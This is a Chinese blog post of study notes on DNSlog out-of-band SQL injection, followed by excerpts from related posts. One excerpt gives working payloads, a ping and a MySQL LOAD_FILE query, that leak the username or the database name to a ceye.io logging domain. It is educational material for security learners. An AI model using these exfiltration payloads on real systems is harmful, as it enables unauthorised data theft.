学习DNSlog注入

最新推荐文章于 2025-03-13 19:20:19 发布
最新推荐文章于 2025-03-13 19:20:19 发布
阅读量330 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_41631806/article/details/105414636
版权

##学习 DNSlog注入
简介
在sql注入无回显的情况下,盲注是一种办法,但费时。dnslog注入可以将数据外带,通过dns解析日志读取回显数据。

原理及利用场景详见大佬们的博客
t1ddl3r–《使用DNSLOG拯救你的盲打盲注
afanti–《 巧用DNSlog实现无回显注入
Armyzer0–《利用DNSlog回显Weblogic(CVE-2017-10271) 漏洞执行命令结果
卿’s Blog–《DNSlog注入

其他:
利用条件:需要服务器能执行具有调用dns解析的函数或命令。

NS记录是域名服务器记录,用来指定域名由哪台服务器来进行解析。

MySQL利用条件 需要在Windows下,能使用load_file()函数解析你的dnsserver,大多需要my.ini设置参数secure_file_priv="",即空。

在线DNSlog平台(已测试):
http://ceye.io
http://www.dnslog.cn/
在使用平台的使用遇到一个问题困扰了很久,原因不明:
mysql注入时,平台一直收不到dns记录,但是通过url访问平台给的域名可以。如果你也遇到这种情况,不要慌,主要检查自己的语法没错就行。最后我是先用cmd来ping一下域名,再测试mysql就成功了(成功的时候注入有延时),不知道这是不是解决方法。

(注:本人菜鸡,个人见解,如有错误,欢迎评论指出)

onlyoneya
关注
DNSlog注入
7Riven's blog
12-31 985
DNSlog注入产生 测试一些网站的时候,一些注入都是无回显的,可以通过写脚本来进行盲注,但有些网站会ban掉我们的ip,可以通过设置ip代理池解决,但是盲注往往效率很低,所以产生了DNSlog注入DNSlog注入应用场景 sql注入的盲注、无回显的命令执行、无回显的SSRF DNSlog注入原理 有一个可以配置的域名(比如:ceye.io),然后通过代理商设置域名(ceye.io)...
DNSlog注入原理
sjp_1996的博客
04-20 3417
DNSlog注入原理及实验 遵守我国网络安全法,仅用于渗透测试交流学习。 DNS解析过程 用户输入域名,浏览器知道是域名,然后通过DNS解析为IP地址,最后浏览器通过IP地址访问服务器。IP地址与域名是应是一对多映射的关系。 DNSlog的产生 DNS在解析的过程中产生日志文件,这些日志文件记录了访问时间、域名、IP地址等信息内容。 实验 1、公共DNS免费平台:www.DNSlog.con,点击GetSubDomain,会随机生成一个域名。 此时打开CMD,用ping命令,ping通这个域名。因为我的
DNSLOG 注入
qq_33441500的博客
10-21 773
DNSLOG 注入 在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起DNS请求,这个时候就可以通过DNSlog把想获...
SQL注入(7)之DNSLOG注入
最新发布
十步不敢沙人的博客
03-13 854
DNSLog注入如何实现无回显数据窃取?解析盲注与外带数据结合攻击链路,拆解DNS请求窃密步骤及防御策略,强化隐蔽漏洞检测能力!
DNSLog注入
一期一会的博客
01-13 4665
DNSLog注入原理 在sql注入时为布尔盲注、时间盲注,注入的效率低且线程高容易被waf拦截,又或者是目标站点没有回显,我们在读取文件、执行命令注入等操作时无法明显的确认是否利用成功,这时候就要用到我们的DNSlog注入。 首先需要有一个可以配置的域名,比如:xxx.io,然后通过代理商设置域名 xxx.io 的 nameserver 为自己的服务器 A,然后再服务器 A 上配置好 DNS Server,这样以来所有 xxx.io 及其子域名的查询都会到 服务器 A 上,这时就能够实时地监控域名查询请
mysql注入---DNSLOG注入
nini_boom的博客
07-21 602
不一定学习进度速度快,就代表掌控的东西就多。学习的目标在于对于理解的知识深度和广度,速度快会有很多时间学习广度的东西,但在有限广度的情况下,理解的深度才是更重要的,所以在这种情况下,不要在意学习的进度,把握住学习的节奏,向更深处理解。扎下深根的竹子,在疯狂生长的时候才有更多的后备力量。 0x01 DNSLOG注入 当我们遇到了盲注、延时注入时,页面没有具体的返回。 但是盲注、延时注入需要进行大...
dnslog注入
qq_40039615的博客
06-11 230
首先 ceye是一个网站 不是一个应用程序 http://ceye.io 这个是他的网址 操作: ping %USERNAME%.b182oj.ceye.io curl sk7s6n.ceye.io 核心语法:Loadfile 函数只能在windows操作系统执行,所以目标一定要是windows操作系统 SELECT LOAD_FILE(CONCAT('\\\\',(select database()),'.mysql.sk7s6n.ceye.io\\test')); 官方.
sqlmap结合dnslog外带注入
newlife1441的博客
08-05 754
目录📓前言📓操作步骤1.win11中下载小皮搭建sqli-labs靶场并查看win11数据库中的文件读取配置2.环境准备2.1Windows server2008 2.1.1搭建dns服务器2.2测试2.2.1设置靶机的网络的dns为server20082.2.2在win11靶机ping一下server2008中创建的域名并打开kali查看 2.2.3server2008中创建转发器2.2.4测试转发器的域名是否可以ping通并查看kali中接收情况2.3开始sqlmap使用dnslog外带注入2.3...
https防止注入_数据库DNSLog外带注入总结
weixin_39553600的博客
11-20 646
sql注入中利用的骚姿势你又知道几个?DNSLog外带注入DNSlog带外注入?(OOB)其实是一样的,叫法不同!本人还是习惯叫外带注入,自我感觉,比较顺口为什么需要外带注入?当我们对一个数据库进行注入时,无回显,且无法进行时间注入,那么就可以利用一个通道,把查询到数据通过通道带出去,这里的通道包括:http请求、DNS解析、SMB服务等...
利用DNSlog外带数据注入
qq_68163788的博客
02-12 1144
在SQL注入中,利用DNSlog外带数据是一种有效的技术,特别是在面对盲注时。DNSlog平台,如CEYE和Burpsuite专业版,允许用户生成域名并记录访问情况。通过将特定数据嵌入DNS请求中,攻击者可以获取敏感信息。 在SQL注入的场景下,特别是当secure_file_priv值为空时,可以使用LOAD_FILE和INTO OUTFILE语句导出数据。以靶场测试为例,攻击者可以通过时间盲注的方法逐步推测数据库的名称。通过发送特定的SQL语句,结合SLEEP函数,攻击者可以判断出数据库名的字符。
84.网络安全渗透测试—[SQL注入篇23]—[高级注入技巧-dnslog无回显注入]
qwsn
01-21 4440
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、高级注入技巧 dnslog无回显注入 1、原理 2、dnslog平台 3、MySQL dnslog无回显注入示例: 4、SQLSERVER dnslog无回显注入示例: 5、总结:
SQL注入之DNS_log注入
weixin_47785246的博客
07-11 950
SQL注入之DNS_log注入 这篇文章将系统的讲解,SQL注入中的DNS_log注入的原理、方法、以及靶场练习writeup。 文章目录SQL注入之DNS_log注入前言一、DNS_log注入原理二、靶场实战1.DNSlog 平台2.封神台靶场总结 前言 关于SQL注入的详细内容请看我之前写的文章 提示:以下是本篇文章正文内容,下面案例可供参考 一、DNS_log注入原理 我们都知道,DNS解析是一种用户访问域名时,客户端向DNS发起DNS查询的到目标服务器ip地址,进而实现通信的机制,而
DNS_LOG注入
学习、分享、交流
05-19 1718
DNSLOG注入:利用DNS解析,日志记录把数据库里面的内容给带出来···
【渗透测试】DNSLog注入
ssrf
10-25 4065
目录 提示:这里可以添加系列文章的所有文章的目录,目录需要自己手动添加 例如:第一章 Python 机器学习入门之pandas的使用 提示:写完文章后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录目录前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、p
DNSlog注入(利用DNSlog平台将SQL盲注变成回显注入
柠檬i的博客
08-07 1753
DNSlog注入是一种利用DNS服务器记录域名解析请求的特性,来获取SQL注入结果的技术。它的原理是通过构造一个包含数据库信息的子域名,然后使用MySQL的load_file函数或其他方法,让目标服务器向DNS服务器发起解析请求,从而在DNS服务器上留下注入结果的痕迹。
Dnslog外带检测dns回显
03-08
### Dnslog 外带检测与 DNS 回显技术原理 #### DNSLog 外带检测的技术原理 DNSLog 外带是一种利用 DNS 协议特性绕过网络边界限制的方法。当攻击者成功注入特定的有效载荷到目标应用程序中时,该有效载荷会触发一个外部的 DNS 请求。这个请求通常会被发送至由攻击者控制的 DNS 服务器上,在那里它可以被记录下来并用于推断内部系统的状态或数据[^1]。 为了实现有效的 DNSLog 外带检测,安全团队可以采取多种策略: - **监控异常流量模式**:通过设置基线来识别正常业务操作中的典型行为,并标记任何偏离这些标准的行为作为潜在威胁。 - **实时日志分析**:部署专门的日志管理系统(SIEM),能够快速处理大量来自不同源的数据流,并应用机器学习算法自动发现可疑活动。 - **黑名单/白名单管理**:维护已知恶意 IP 地址列表以及可信资源库,以便及时阻止非法连接尝试;同时允许合法通信不受干扰地继续进行。 ```python import logging from datetime import timedelta def monitor_dns_requests(logs, threshold=50): """Monitor and alert on unusual number of DNS requests.""" recent_logs = logs.filter(timestamp__gte=datetime.now()-timedelta(hours=1)) request_count = recent_logs.count() if request_count > threshold: logging.warning(f"Unusual activity detected: {request_count} DNS requests in the last hour.") ``` #### DNS 回显的工作机制 DNS 回显是指一种特殊的 DNS 查询方式,其中客户端发出带有自定义子域部分的查询字符串给指定名称服务器。如果配置得当,则每次这样的查询都会导致相应的响应消息返回给原始发起方。这种方法常用来验证某些功能是否按预期工作,或是作为一种简单的调试工具[^4]。 具体来说,对于 Web 应用程序而言,可以通过构造特殊 URL 来触发展示页面加载过程中产生的错误信息或其他敏感细节。例如,`http://victim.com/?debug=true&domain=<attacker-controlled-subdomain>.example.com` 可能会导致浏览器向 `<attacker-controlled-subdomain>.example.com` 发送一次 A 记录查找请求,从而暴露出有关受害者环境的信息。 #### 实现方法概述 要防范上述提到的风险,建议采用以下措施加强防护力度: - 对于所有进出组织内外部网络边界的 DNS 流量实施严格过滤; - 定期审查现有的防火墙规则集以确保其有效性; - 使用最新的入侵防御系统 (IPS) 和防病毒软件保护关键资产免受最新形式的攻击; - 教育员工提高网络安全意识,减少人为失误带来的安全隐患。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值